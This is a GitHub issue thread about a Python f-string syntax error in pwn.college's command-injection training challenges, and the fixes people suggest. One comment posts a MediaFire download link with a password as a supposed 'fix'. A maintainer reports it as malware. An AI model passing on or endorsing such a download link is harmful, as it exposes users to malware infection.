### ISSUE TITLE
Web Security CMDi 1 and 2 syntax error

### ISSUE THREAD

**Issue by prathamgupta36** [pwncollege/intro-to-cybersecurity-dojo#12]
When the challenge server is run it gives the syntax error `SyntaxError: f-string expression part cannot include a backslash`, potential fix is to use `.format()` on the return object on line 20.

[cmdi-ls-pipe](https://github.com/pwncollege/intro-to-cybersecurity-dojo/blob/main/web-security/cmdi-ls-pipe/server#L20)
[cmdi-ls-quote](https://github.com/pwncollege/intro-to-cybersecurity-dojo/blob/main/web-security/cmdi-ls-quote/server#L20)
[cmdi-ls-semicolon](https://github.com/pwncollege/intro-to-cybersecurity-dojo/blob/main/web-security/cmdi-ls-semicolon/server#L20)

**Comment by prathamgupta36** [comment]
Update: tried the with `.format()` and it works so made a pr

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by zardus** [comment]
(I reported @KrissV2 for malware)

**Comment by zardus** [comment]
Ugh, python 12 allows this, and that's what I was deving on. It turns out <pre> handles newlines just fine, so the replace isn't necessary to begin with.

**Comment by prathamgupta36** [comment]
oh got it so I was just replacing your `.replace`
